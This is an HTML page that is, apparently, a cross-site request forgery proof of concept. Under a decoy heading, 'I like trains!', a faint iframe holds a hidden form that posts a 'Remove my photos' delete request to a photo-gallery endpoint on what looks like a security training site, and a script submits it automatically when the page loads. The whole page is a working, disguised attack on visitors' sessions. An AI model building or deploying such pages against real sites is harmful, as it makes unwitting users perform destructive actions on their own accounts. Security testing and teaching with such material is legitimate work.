<html>
  <body>
  <iframe style="opacity: 0.15; width: 500px; height: 500px;" srcdoc='
  	<form action="http://html5sec.azurewebsites.net/www/upload/galery.php" method="POST">
      <input type="hidden" name="delete" value="Remove&#32;my&#32;photos" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>'></iframe>
  </body>
  <h1>I like trains!</h1>
</html>
